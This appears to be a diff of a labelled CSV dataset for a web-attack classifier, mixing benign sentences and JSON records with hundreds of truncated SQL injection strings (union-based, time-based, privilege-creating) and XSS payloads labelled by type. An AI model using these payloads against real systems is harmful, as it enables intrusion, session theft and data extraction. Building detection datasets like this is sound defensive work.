+"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10790 +<acronym onpointerup=alert(1)>XSS</acronym>,1,XSS,4327 +1'+ ( select ankx where 6789 = 6789,2,SQLi,17450 +"<title oncontextmenu=""alert(1)"">test</title>",1,XSS,2592 +Select your favorite.,0,normal,24821 +"1' union all select null,null,null,null#",2,SQLi,13049 +Roma will premiere in select theaters and on Netfl,0,normal,25739 +"-4093' ) ) union all select 5785,5785,5785#",2,SQLi,20122 +1' and 7528 = 2894 and 'qoyw' = 'qoyw,2,SQLi,13921 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10592 +1'+ ( select 'hoqt' where 4877 = 4877 or 4915 = ( ,2,SQLi,19904 +Where to find the table?,0,normal,23373 +( select top 1,2,SQLi,11616 +"<figcaption onmousedown=""alert(1)"">test</figcaptio",1,XSS,6770 +"<tr onmouseleave=""alert(1)"">test</tr>",1,XSS,5625 +"<;IMG SRC="";mocha:[code]"";>;",1,XSS,1607 +1 where 1931 = 1931 and sleep ( 5 ) --,2,SQLi,18120 +1,0,normal,26728 +Mark Warner's position on the Senate Select Commit,0,normal,25891 +<textarea onpointerdown=alert(1)>XSS</textarea>,1,XSS,3815 +1 ) as usnn where 3201 = 3201,2,SQLi,14280 +"1"" ) as jask where 7629 = 7629 or 2633 = dbms_pipe",2,SQLi,17263 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10557 +anything' OR 'x'='x,2,SQLi,10170 +"<style>@keyframes x{}</style><h1 style=""animation-",1,XSS,1763 +1' ) ) as cpwx where 5378 = 5378 rlike ( select * ,2,SQLi,15682 +"1"" ) as tqxa where 6751 = 6751 or ( select 2* ( if",2,SQLi,21788 +"1"" ) where 5870 = 5870 union all select null,null,",2,SQLi,19126 +<img srcset=validimage.png onload=alert(1)>,1,XSS,2474 +"1"" where 6200 = 6200 and elt ( 1210 = 1210,sleep (",2,SQLi,15916 +"<frame onkeypress=""alert(1)"" contenteditable>test<",1,XSS,6741 +Find data where necessary.,0,normal,23278 +"-1791' union all select 9316,9316,9316,9316,9316,9",2,SQLi,15731 +call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,12202 +<listing id=x tabindex=1 onbeforedeactivate=alert(,1,XSS,7946 +1'|| ( select 'svgd' from dual where 5188 = 5188 u,2,SQLi,12913 +"-8841%"" ) or 4361 = 1910",2,SQLi,14372 +I go to the wine shop and select a few bottles.,0,normal,26072 +"1' union all select null,null,null#",2,SQLi,20593 +"<keygen onmousemove=""alert(1)"">test</keygen>",1,XSS,6374 +Rhodes informed the House of Commons Select Commit,0,normal,25748 +"1%' ) ) union all select null,null,null#",2,SQLi,16619 +"<ins onmouseup=""alert(1)"">test</ins>",1,XSS,8261 +<set onpointermove=alert(1)>XSS</set>,1,XSS,7564 +><script+src=https://df-webservices.comet.aol.com/,1,XSS,9798 +<param onblur=alert(1) tabindex=1 id=x></param><in,1,XSS,6171 +or 1 in ( select @@version ) --,2,SQLi,11478 +<shadow id=x tabindex=1 onfocusin=alert(1)></shado,1,XSS,3599 +"<element onkeyup=""alert(1)"" contenteditable>test</",1,XSS,6291 +"<keygen onkeydown=""alert(1)"" contenteditable>test<",1,XSS,4635 +"1' ) and 3824 = benchmark ( 5000000,md5 ( 0x765556",2,SQLi,15150 +1 ) where 5309 = 5309 or 7552 = ( select count ( *,2,SQLi,16512 +Select a workout plan for the week.,0,normal,24028 +"<STYLE>@im\port'\ja\vasc\ript:alert("""")';</STYLE>",1,XSS,6232 +1 ) as wokl where 1368 = 1368 union all select nul,2,SQLi,17683 +"-9062"" or 6872 = 6872 and ""aumq"" like ""aumq",2,SQLi,18363 +"{""id"":null,""firstName"":""Zoey"",""lastName"":""Tam"",""ad",0,normal,26912 +"{""id"":null,""name"":""Seel""}",0,normal,26856 +ORDER BY 28--,2,SQLi,10270 +-6519' ) ) as tdlt where 5040 = 5040 or 1570 = con,2,SQLi,12775 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5753 +<col onpointerdown=alert(1)>XSS</col>,1,XSS,8155 +"-8777"" ) as lalf where 8606 = 8606 or elt ( 4397 =",2,SQLi,13506 +"<style oncopy=""alert(1)"" contenteditable>test</sty",1,XSS,3088 +<data onfocusout=alert(1) tabindex=1 id=x></data><,1,XSS,1908 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,6885 "{""id"":null,""name"":""appropriate watch""}",0,normal,27599 -"<shadow draggable=""true"" ondrag=""alert(1)"">test</s",1,XSS,7674 -"iif ( 2840 = 3788,1,1/0 )",2,SQLi,19730 -<hr onblur=alert(1) tabindex=1 id=x></hr><input au,1,XSS,8173 -"{""id"":null,""firstName"":""Ruchirashil"",""lastName"":""Y",0,normal,26837 -"<dialog oncut=""alert(1)"" contenteditable>test</dia",1,XSS,5871 -Update your profile with the new picture.,0,normal,22891 -1 ) ) ) and char ( 107 ) ||char ( 121 ) ||char ( 9,2,SQLi,19182 -"1%' ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694a",2,SQLi,17303 -"-8824%' ) ) or make_set ( 9354 = 9354,7185 ) and (",2,SQLi,18031 -<style>:target {color:red;}</style><noscript id=x ,1,XSS,5123 -"<body onpaste=""alert(1)"" contenteditable>test</bod",1,XSS,5127 -1' in boolean mode ) and 6969 = ( select 6969 from,2,SQLi,13624 -1' ) where 8776 = 8776 and 6969 = ( select 6969 fr,2,SQLi,15035 -<hgroup id=x tabindex=1 onbeforeactivate=alert(1)>,1,XSS,4622 -<caption onfocusout=alert(1) tabindex=1 id=x></cap,1,XSS,6810 -1 ) as nlig where 5964 = 5964 and 2388 = benchmark,2,SQLi,16749 -1' ) ) as kpdl where 4443 = 4443 union all select ,2,SQLi,15746 -select * from users where id = 1 ||1 union select ,2,SQLi,11480 -<meta id=x tabindex=1 ondeactivate=alert(1)></meta,1,XSS,2126 -"<caption onmousedown=""alert(1)"">test</caption>",1,XSS,8151 -<svg><image href=validimage.png onload=alert(1)>,1,XSS,8718 -1' ) and 8189 = ( select count ( * ) from sysibm.s,2,SQLi,13014 +"<embed ondblclick=""alert(1)"">test</embed>",1,XSS,7676 +-4681 or 4747 = dbms_utility.sqlid_to_sqlhash ( ( ,2,SQLi,19732 +<style>:target {transform: rotate(180deg);}</style,1,XSS,8175 +"{""id"":null,""name"":""Staryu""}",0,normal,26834 +"<u draggable=""true"" ondragenter=""alert(1)"">test</u",1,XSS,5873 +Insert the memory card into the slot.,0,normal,22893 +"-3505"" ) where 2340 = 2340 or 9323 = 9323#",2,SQLi,19184 +"1"" and 8514 = ( select count ( * ) from domain.dom",2,SQLi,17305 +"1"" ) ) ) or exp ( ~ ( select * from ( select conca",2,SQLi,18033 +"<datalist oncopy=""alert(1)"" contenteditable>test</",1,XSS,5125 +<style>:target {color:red;}</style><div id=x style,1,XSS,5129 +"1%"" and elt ( 4249 = 4249,7259 ) and ""%"" = """,2,SQLi,13626 +-7184 ) as fshx where 3408 = 3408 or 5023 = ctxsys,2,SQLi,15037 +"<font onbeforecut=""alert(1)"" contenteditable>test<",1,XSS,4624 +<strong onpointerup=alert(1)>XSS</strong>,1,XSS,6812 +1 ) ) as kccx where 7547 = 7547 union all select n,2,SQLi,16751 +"1"" ) ) ) or char ( 117 ) ||char ( 111 ) ||char ( 1",2,SQLi,15748 +"admin"" ) or ( ""1"" = ""1",2,SQLi,11482 +<span id=x tabindex=1 onbeforeactivate=alert(1)></,1,XSS,2127 +<track id=x tabindex=1 onfocus=alert(1)></track>,1,XSS,8153 +"<audio oncopy=""alert(1)"" contenteditable>test</aud",1,XSS,8720 +select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,13016 <dialog open onclose=alert(1)><form method=dialog>,1,XSS,56 -1' ) ) or char ( 117 ) ||char ( 111 ) ||char ( 105,2,SQLi,17023 +"1%"" ) ) ) union all select null,null,null,null,nul",2,SQLi,17025 "<HEAD><META HTTP-EQUIV=""CONTENT-TYPE"" CONTENT=""tex",1,XSS,303 -1%' ) ) ) and 2444 = 9282#,2,SQLi,22196 -1'+ ( select xzvf where 9727 = 9727,2,SQLi,17661 -"1"" ) ) as vxkn where 2443 = 2443 or 4411 = ( selec",2,SQLi,14179 -"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,13569 -"<area onmousedown=""alert(1)"">test</area>",1,XSS,4433 -"-7808"" ) ) as jgkk where 9230 = 9230 or elt ( 1032",2,SQLi,20029 -"1"" where 7879 = 7879",2,SQLi,20528 -1 ) ) or ( select 2* ( if ( ( select * from ( sele,2,SQLi,19263 -"-8893%' ) ) or elt ( 1032 = 1032,3623 ) and ( ( '%",2,SQLi,12395 -Update the app.,0,normal,22878 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10479 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10454 -"<tt onkeydown=""alert(1)"" contenteditable>test</tt>",1,XSS,5241 -Modify the website layout.,0,normal,22575 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10489 -Check conditions where applicable.,0,normal,23322 -Where's the emergency room?,0,normal,23625 --7810 or 4493 = utl_inaddr.get_host_address ( chr ,2,SQLi,16283 -1' ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ,2,SQLi,14125 -"Because when they came in to select ideas, they we",0,normal,26330 -uni/**/on sel/**/ect,2,SQLi,10161 -"select count ( * ) from all_users t1,all_users t2,",2,SQLi,18978 -"-3667%' ) ) union all select 3560,3560,3560--",2,SQLi,18778 -"1,row ( 7937,5067 ) > ( select count ( * ) ,concat",2,SQLi,16908 -"<svg ondblclick=""alert(1)"">test</svg>",1,XSS,6377 -"<progress onpaste=""alert(1)"" contenteditable>test<",1,XSS,6982 --9668' ) ) as orfu where 5822 = 5822 or 2724 in ( ,2,SQLi,13717 -Delete emails.,0,normal,23062 -"<plaintext onbeforepaste=""alert(1)"" contenteditabl",1,XSS,3901 -"{""id"":null,""name"":""smaller""}",0,normal,27127 -1 where 1299 = 1299,2,SQLi,12892 -"1%' ) or updatexml ( 1808,concat ( 0x2e,0x7171706a",2,SQLi,21970 --5143'+ ( select 'zyrr' where 8405 = 8405 union al,2,SQLi,21509 -Select the best recipe.,0,normal,24341 -I want to select a movie for our movie night.,0,normal,23955 -and WAITFOR DELAY '0:0:5'--,2,SQLi,11315 -begin,0,normal,23162 -%27%20or%201=1,2,SQLi,10162 -"1"" or 8315 = ( select count ( * ) from sysibm.syst",2,SQLi,17056 -"<video onmouseup=""alert(1)"">test</video>",1,XSS,4189 +"-8021"" ) union all select 1166,1166,1166,1166--",2,SQLi,22198 +"1"" ) where 7471 = 7471 and 8514 = ( select count (",2,SQLi,17663 +"1 ) ) ) or row ( 1045,7562 ) > ( select count ( * ",2,SQLi,14181 +"-2448%"" ) or 3038 = 3038",2,SQLi,13571 +"<datalist onmouseenter=""alert(1)"">test</datalist>",1,XSS,4435 +"-8758' union all select 6885,6885,6885,6885,6885,6",2,SQLi,20031 +"1%"" ) ) union all select null,null--",2,SQLi,20530 +1 or 8156 = ( select count ( * ) from generate_ser,2,SQLi,19265 +"-3081"" ) ) ) or 3736 = 1899",2,SQLi,12397 +Modify the style.,0,normal,22880 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10481 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10456 +"<param oncut=""alert(1)"" contenteditable>test</para",1,XSS,5243 +Delete the incorrect entry.,0,normal,22577 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10491 +Determine fields where valid.,0,normal,23324 +Where's the orthodontist?,0,normal,23627 +"select count ( * ) from all_users t1,all_users t2,",2,SQLi,16285 +"-2013"" ) ) as kisy where 3802 = 3802 or 5903 = ( '",2,SQLi,14127 +Be sure to select the right gender and age group i,0,normal,26332 +)) or pg_sleep(__TIME__)--,2,SQLi,10163 +1' ) ) ) or char ( 117 ) ||char ( 111 ) ||char ( 1,2,SQLi,18980 +"waitfor delay '0:0:5' and ""cvqn"" like ""cvqn",2,SQLi,18780 +"1', ( select ( case when ( 6750 = 6750 ) then 1 el",2,SQLi,16910 +"<table onpaste=""alert(1)"" contenteditable>test</ta",1,XSS,6379 +<ruby id=x tabindex=1 ondeactivate=alert(1)></ruby,1,XSS,6984 +select ( case when ( 2140 = 5325 ) then 2140 else ,2,SQLi,13719 +Create poem.,0,normal,23064 +"<li onbeforecut=""alert(1)"" contenteditable>test</l",1,XSS,3903 +"{""id"":null,""name"":""sea""}",0,normal,27125 +-6529' ) or ( 4309 = 1601 ) *1601,2,SQLi,12894 +"1 ) ) union all select null,null,null,null,null#",2,SQLi,21972 +"-8200' in boolean mode ) union all select 3360,336",2,SQLi,21511 +I'll select my dress.,0,normal,24343 +I need to decide where to go for shopping.,0,normal,23957 +;WAITFOR DELAY '0:0:5',2,SQLi,11317 +commit,0,normal,23164 +x' AND 1=(SELECT COUNT(*) FROM tabname); --,2,SQLi,10164 +"-1079"" ) where 2865 = 2865 union all select 2865,2",2,SQLi,17058 +<dfn id=x tabindex=1 onbeforedeactivate=alert(1)><,1,XSS,4191 "<img src\x32=x onerror=""javascript:alert(1)"">",1,XSS,667 -"<acronym onkeypress=""alert(1)"" contenteditable>tes",1,XSS,3267 -"1%"" ) and 7756 = dbms_utility.sqlid_to_sqlhash ( (",2,SQLi,18272 -<td id=x tabindex=1 ondeactivate=alert(1)></td><in,1,XSS,8473 -admin' or 1=1#,2,SQLi,9912 -1'|| ( select 'bpml' where 7360 = 7360 or extractv,2,SQLi,12648 -The chart above highlights a select few names from,0,normal,25476 -Select the perfect camera settings.,0,normal,24072 -"1"" ) ) as gprr where 5975 = 5975 and 2388 = benchm",2,SQLi,22416 -select * from users where id = 1 + ( 1 ) or 1 = 1 ,2,SQLi,11638 -<picture id=x tabindex=1 onfocusin=alert(1)></pict,1,XSS,6091 -"<link onmouseup=""alert(1)"">test</link>",1,XSS,6239 -1' ) ) and 8514 = ( select count ( * ) from domain,2,SQLi,15184 -<input type=radio id=x onfocusin=alert(1)>,1,XSS,7351 -Select the right color for the walls.,0,normal,24215 -"1"" ) ) ) union all select null,null,null,null,null",2,SQLi,17145 -<html id=x tabindex=1 onactivate=alert(1)></html>,1,XSS,6255 -"1' ) procedure analyse ( extractvalue ( 5840,conca",2,SQLi,18291 -"-4670"" ) ) or 3038 = 3038",2,SQLi,12235 -"1 ) ) or benchmark ( 10000000,MD5 ( 1 ) ) #",2,SQLi,12016 -"<rt onmousedown=""alert(1)"">test</rt>",1,XSS,3819 -"<button onkeypress=""alert(1)"" contenteditable>test",1,XSS,6270 -"<bgsound oncut=""alert(1)"" contenteditable>test</bg",1,XSS,4301 -"<slot draggable=""true"" ondragleave=""alert(1)"">test",1,XSS,5570 -"1%"" and 6408 = 7959--",2,SQLi,14389 -<svg><map onload=alert(1)></map>,1,XSS,7942 -"<textarea onmouseleave=""alert(1)"">test</textarea>",1,XSS,4165 -1' ) ) as joco where 2922 = 2922,2,SQLi,22356 -"1%' or ( select 9173 from ( select count ( * ) ,co",2,SQLi,19964 -"1"" ( select ( case when ( 4587 = 4587 ) then regex",2,SQLi,19217 --4954' ) or 8571 = 8571--,2,SQLi,21834 -"-8491"" where 9043 = 9043 union all select 9043,904",2,SQLi,19857 -Sort the scattered papers.,0,normal,22712 -"select count ( * ) from generate_series ( 1,500000",2,SQLi,16522 -"<i oncopy=""alert(1)"" contenteditable>test</i>",1,XSS,7044 -<iframe onfocusout=alert(1) id=x><input autofocus>,1,XSS,4893 -"1"" ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ",2,SQLi,18565 -ORDER BY 17,2,SQLi,10321 -Select the best route for your road trip.,0,normal,24115 -1' rlike ( select ( case when ( 5384 = 7060 ) then,2,SQLi,19562 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4855 -<select onfocusout=alert(1) id=x></select><input a,1,XSS,4638 -"1%"" ) or 8466 = benchmark ( 5000000,md5 ( 0x694a47",2,SQLi,21500 -javascript://--></title></style></textarea></scrip,1,XSS,9551 -Select a scent for your sanctuary.,0,normal,24033 -1' ) ) ) or 2633 = dbms_pipe.receive_message ( chr,2,SQLi,20646 -1' ) where 2330 = 2330 and ( select * from ( selec,2,SQLi,17716 -OR 3409=3409 AND ('pytW' LIKE 'pytY,2,SQLi,10210 -Where's your SQL background?,0,normal,23387 -Jessi drew out the inevitable by taking her time t,0,normal,25935 -<style>:target {color: red;}</style><base id=x sty,1,XSS,6942 -<set onpointerout=alert(1)>XSS</set>,1,XSS,8018 -Create a captivating story.,0,normal,22626 -"javascript:'/*`/*'/*""/*\""/*<FRAME SRC= javascript:",1,XSS,9522 -"<script onmouseout=""alert(1)"">test</script>",1,XSS,6950 -<body id=x tabindex=1 onfocusin=alert(1)></body>,1,XSS,6882 -"1"" and 3202 = like ( 'abcdefg',upper ( hex ( rando",2,SQLi,13052 -1'|| ( select 'xtcb' where 5240 = 5240,2,SQLi,15782 -"1"" ) where 6903 = 6903",2,SQLi,20915 -<big onpointerdown=alert(1)>XSS</big>,1,XSS,4674 --3859 ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 113,2,SQLi,12174 -"<track draggable=""true"" ondragenter=""alert(1)"">tes",1,XSS,6997 -<img/src=`` onerror=this.onerror=confirm(1),1,XSS,1253 -1 ) ) or pg_sleep ( __TIME__ ) --,2,SQLi,11471 -1' ) and 7533 = 7533 and ( 'dbjq' = 'dbjq,2,SQLi,15255 -1' and 6414 = ( select count ( * ) from rdb$fields,2,SQLi,19759 -1' ) as bvvl where 9818 = 9818 and ( select 9067 f,2,SQLi,19199 -( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,21104 -Join the fitness club for a healthier lifestyle.,0,normal,22929 -create user name identified by pass123 temporary t,2,SQLi,10041 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4859 -I'll select the appetizer.,0,normal,24286 -<multicol onpointerup=alert(1)>XSS</multicol>,1,XSS,8581 -<image2 onpointerenter=alert(1)>XSS</image2>,1,XSS,8428 -1' where 9381 = 9381,2,SQLi,17462 -%2A%28%7C%28mail%3D%2A%29%29,2,SQLi,10177 -<rp id=x tabindex=1 onactivate=alert(1)></rp>,1,XSS,4364 -1'|| ( select 'pygt' from dual where 5543 = 5543 u,2,SQLi,17155 -1)) or sleep(5)#,2,SQLi,10358 -"To use the feature, tap the car icon next to ""Wher",0,normal,25250 -1%' ) ) and 6537 = dbms_pipe.receive_message ( chr,2,SQLi,16634 -"1 ) union all select null,null,null,null#",2,SQLi,14490 -"Gaine, general manager of the company, stated befo",0,normal,26151 -"<ruby oncontextmenu=""alert(1)"">test</ruby>",1,XSS,7240 -1' ) as ghks where 5128 = 5128 union all select nu,2,SQLi,14431 -<tbody id=x tabindex=1 onbeforedeactivate=alert(1),1,XSS,3420 -1,0,normal,26658 -or uname like '%,2,SQLi,10016 -"{""id"":null,""firstName"":""Renee"",""lastName"":""Tan"",""a",0,normal,27076 -<address id=x tabindex=1 onbeforedeactivate=alert(,1,XSS,4977 -"<legend onkeydown=""alert(1)"" contenteditable>test<",1,XSS,4545 -"1',iif ( 4861 = 6268,1,1/0 )",2,SQLi,21950 -Select your dream gadget.,0,normal,24324 -"-1863' ) or make_set ( 9354 = 9354,7185 ) and ( 'w",2,SQLi,17101 -1 union all select null#,2,SQLi,21165 -"-1184"" ) ) ) union all select 1482--",2,SQLi,12339 -<discard onpointerenter=alert(1)>XSS</discard>,1,XSS,2049 -<del onpointerleave=alert(1)>XSS</del>,1,XSS,5998 -Where did you find that antique watch?,0,normal,22985 -Where's the podiatrist?,0,normal,23630 -"1"" ) ) ) and row ( 6237,7469 ) > ( select count ( ",2,SQLi,15445 -1' ) ) as vuzt where 4971 = 4971,2,SQLi,13457 -"1%' and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,20563 -"<spacer onmouseenter=""alert(1)"">test</spacer>",1,XSS,4810 -"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitf",2,SQLi,10917 -"<u onclick=""alert(1)"">test</u>",1,XSS,3637 -Where's the dam?,0,normal,23525 -Where's the citadel?,0,normal,23575 -1' ) ) and 4595 = 4595#,2,SQLi,17845 --5432' ) as dndq where 9633 = 9633 order by 1#,2,SQLi,15107 -<shadow onpointerover=alert(1)>XSS</shadow>,1,XSS,5990 -"?asfunction:getURL,javascript:alert(1)//"",",1,XSS,9861 -"1' ) ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694",2,SQLi,18385 -1' or 8421 = ( select count ( * ) from generate_se,2,SQLi,12764 -"1"" ) or 5286 = ( select count ( * ) from all_users",2,SQLi,15159 -"<q onmouseleave=""alert(1)"">test</q>",1,XSS,8176 +<button onpointerup=alert(1)>XSS</button>,1,XSS,3269 +1'|| ( select 'nwve' where 7721 = 7721,2,SQLi,18274 +"<frameset draggable=""true"" ondragend=""alert(1)"">te",1,XSS,8475 +admin') or ('1'='1,2,SQLi,9914 +"1 ) where 9338 = 9338 or extractvalue ( 1297,conca",2,SQLi,12650 +The case concerned whether Select Comfort violated,0,normal,25478 +Select a recipe to cook for dinner.,0,normal,24074 +1' ) ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ,2,SQLi,22418 +select * from users where id = 1 union select @ 1a,2,SQLi,11640 +"<style>@keyframes slidein {}</style><slot style=""a",1,XSS,6093 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,6241 +"1%"" ) procedure analyse ( extractvalue ( 5840,conc",2,SQLi,15186 +<nobr onpointerup=alert(1)>XSS</nobr>,1,XSS,7353 +Select a program for video editing.,0,normal,24217 +1%' ) and ( select 9067 from ( select count ( * ) ,2,SQLi,17147 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6257 +-8042 ) as zhoq where 2120 = 2120 union all select,2,SQLi,18293 +1' in boolean mode ) or 8421 = ( select count ( * ,2,SQLi,12237 +"select * from users where id = 1 or 1#""@ union sel",2,SQLi,12018 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,3821 +<style>:target {color:red;}</style><em id=x style=,1,XSS,6272 +"<bdo onkeydown=""alert(1)"" contenteditable>test</bd",1,XSS,4303 +"<strike onmousedown=""alert(1)"">test</strike>",1,XSS,5572 +1%' ) ) and 6414 = ( select count ( * ) from rdb$f,2,SQLi,14391 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,7944 +<spacer onpointerover=alert(1)>XSS</spacer>,1,XSS,4167 +1' ) ) as dipp where 1714 = 1714,2,SQLi,22358 +select ( case when ( 9434 = 2780 ) then 9434 else ,2,SQLi,19966 +"1"" and elt ( 4249 = 4249,7259 ) and ""tmxx"" = ""tmxx",2,SQLi,19219 +1 ) where 3062 = 3062 or 8466 = benchmark ( 500000,2,SQLi,21836 +1' ) ) ) and 7533 = 7533 and ( ( ( 'hoyw' = 'hoyw,2,SQLi,19859 +Update your travel plans.,0,normal,22714 +"1"" ) ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ",2,SQLi,16524 +<img2 onpointerleave=alert(1)>XSS</img2>,1,XSS,7046 +<tfoot onpointerdown=alert(1)>XSS</tfoot>,1,XSS,4895 +"1' in boolean mode ) or extractvalue ( 1297,concat",2,SQLi,18567 +ORDER BY 19,2,SQLi,10323 +Select the perfect piece of jewelry.,0,normal,24117 +"1"" ) and 8312 = dbms_pipe.receive_message ( chr ( ",2,SQLi,19564 +"<var onmouseout=""alert(1)"">test</var>",1,XSS,4857 +"<HEAD><META HTTP-EQUIV=""CONTENT-TYPE"" CONTENT=""tex",1,XSS,4640 +"-2855' union all select 2495,2495,2495,2495,2495,2",2,SQLi,21502 +!'/</title/'/</style/</script/</textarea/--><p onc,1,XSS,9553 +Select a song to dance to.,0,normal,24035 +1 ) where 7978 = 7978 or 7427 = dbms_pipe.receive_,2,SQLi,20648 +1'|| ( select 'ussi' where 8958 = 8958,2,SQLi,17718 +HAVING 1=0,2,SQLi,10212 +Where's your SQL proficiency?,0,normal,23389 +"Its sixth early-stage fund, True Ventures VI LP, c",0,normal,25937 +"<html draggable=""true"" ondragend=""alert(1)"">test</",1,XSS,6944 +"<sub onmouseleave=""alert(1)"">test</sub>",1,XSS,8020 +Modify the document format.,0,normal,22628 +"javascript:alert()//'//""//\""; '/`/*\/*'/*""/**/(ale",1,XSS,9524 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6952 +"<strike onmouseout=""alert(1)"">test</strike>",1,XSS,6884 +-5982' or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ,2,SQLi,13054 +( select ( case when ( 7018 = 7018 ) then 7018 els,2,SQLi,15784 +"-5672' ) ) union all select 9371,9371,9371,9371,93",2,SQLi,20917 +"<details onmousemove=""alert(1)"">test</details>",1,XSS,4676 +1 ) ) as pzoo where 8036 = 8036 or 6793 = ( select,2,SQLi,12176 +"<frameset oncopy=""alert(1)"" contenteditable>test</",1,XSS,6999 +<img src=``&NewLine; onerror=alert(1)&NewLine;,1,XSS,1254 +declare @q nvarchar ( 200 ) select @q = 0x770061 .,2,SQLi,11473 +"1"" ) as lrew where 6067 = 6067 union all select nu",2,SQLi,15257 +"-3063%"" ) ) ) or 4144 = ( select upper ( xmltype (",2,SQLi,19761 +-3750'+ ( select alpu where 3911 = 3911 order by 1,2,SQLi,19201 +-7633' ) as aslj where 2317 = 2317 or 8571 = 8571-,2,SQLi,21106 +Sort the playing cards before the game.,0,normal,22931 +"exec sp_addlogin 'name' , 'password' --",2,SQLi,10043 +"<div onmousemove=""alert(1)"">test</div>",1,XSS,4861 +Select your favorite movie.,0,normal,24288 +<thead id=x tabindex=1 onbeforedeactivate=alert(1),1,XSS,8583 +<nav id=x tabindex=1 onfocusin=alert(1)></nav>,1,XSS,8430 +"1"" or ( select * from ( select ( sleep ( 5 ) ) ) s",2,SQLi,17464 +)) or sleep(__TIME__)=',2,SQLi,10179 +top[/al/.source+/ert/.source](1),1,XSS,4366 +1'+ ( select 'pgje' where 4658 = 4658 union all se,2,SQLi,17157 +)) or sleep(5)=',2,SQLi,10360 +"To untag someone from a post, select the ""More"" bu",0,normal,25252 +1' and ( 3020 = 3020 ) *6703 and 'hnvf' = 'hnvf,2,SQLi,16636 +1'+ ( select qmez where 3729 = 3729 and 8148 = lik,2,SQLi,14492 +"From there, select Language and Input and then On-",0,normal,26153 +"<tt draggable=""true"" ondragenter=""alert(1)"">test</",1,XSS,7242 +-9556 or ( 2049 = 6967 ) *6967# mhbc,2,SQLi,14433 +"<dd onkeypress=""alert(1)"" contenteditable>test</dd",1,XSS,3422 +1,0,normal,26660 +or user like '%,2,SQLi,10018 +"{""id"":null,""name"":""Flamedramon""}",0,normal,27073 +"<details onmouseenter=""alert(1)"">test</details>",1,XSS,4979 +"<dd onmousemove=""alert(1)"">test</dd>",1,XSS,4547 +1'+ ( select 'zkum' where 5161 = 5161 union all se,2,SQLi,21952 +Select your dream career.,0,normal,24326 +"1 where 7362 = 7362 and 8148 = like ( 'abcdefg',up",2,SQLi,17103 +"-6680%"" ) ) union all select 3719,3719,3719,3719,3",2,SQLi,21167 +"1"" ) ) ) or ( select 9173 from ( select count ( * ",2,SQLi,12341 +<kbd onfocusout=alert(1) tabindex=1 id=x></kbd><in,1,XSS,2050 +"<style>@keyframes x{}</style><tfoot style=""animati",1,XSS,6000 +Sort the color-coded folders on your desk.,0,normal,22987 +Where's the physical therapist?,0,normal,23632 +1 and ( select 2* ( if ( ( select * from ( select ,2,SQLi,15447 +"-9871 union all select 6094,6094,6094,6094,6094,60",2,SQLi,13459 +"1"" ) ) rlike sleep ( 5 ) #",2,SQLi,20565 +"<ins onbeforepaste=""alert(1)"" contenteditable>test",1,XSS,4812 +"""),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20wait",2,SQLi,10919 +"<abbr onkeypress=""alert(1)"" contenteditable>test</",1,XSS,3639 +Where's the castle?,0,normal,23527 +Where's the planetarium?,0,normal,23577 +"1', ( select ( case when ( 2073 = 5314 ) then 1 el",2,SQLi,17847 +1 where 8095 = 8095,2,SQLi,15109 +<center onblur=alert(1) tabindex=1 id=x></center><,1,XSS,5992 +"?goto,javascript:alert(1)"",",1,XSS,9863 +"1%"" ) ) or ( select 2* ( if ( ( select * from ( se",2,SQLi,18387 +"1%"" ) ) ) or char ( 68 ) ||char ( 69 ) ||char ( 97",2,SQLi,12766 +"-9659 ) ) ) union all select 8665,8665,8665,8665,8",2,SQLi,15161 +<style>:target {color: red;}</style><mark id=x sty,1,XSS,8178 "<body onResize body onResize=""javascript:javascrip",1,XSS,405 "<html onMouseWheel html onMouseWheel=""javascript:j",1,XSS,385 -"<hr onmousemove=""alert(1)"">test</hr>",1,XSS,8703 -"META HTTP-EQUIV=""Set-Cookie"" Content=""USERID=<SCRI",1,XSS,7267 -"and (select substring(@@version,2,1))='y'",2,SQLi,10345 -1%' ) and 4595 = 4595#,2,SQLi,18018 -"1%"" ) ) or char ( 117 ) ||char ( 111 ) ||char ( 10",2,SQLi,20385 -"select sleep ( 5 ) and ( ""innk"" = ""innk",2,SQLi,13773 -1'+ ( select onzd where 8452 = 8452 and 2853 = cas,2,SQLi,21169 -<svg><audio onload=alert(1)></audio>,1,XSS,6939 -<sub id=x tabindex=1 onactivate=alert(1)></sub>,1,XSS,6971 --6823' ) ) ) or 4493 = utl_inaddr.get_host_address,2,SQLi,20310 -<embed onpointerdown=alert(1)>XSS</embed>,1,XSS,4159 -Where can I select a course for personal growth?,0,normal,23834 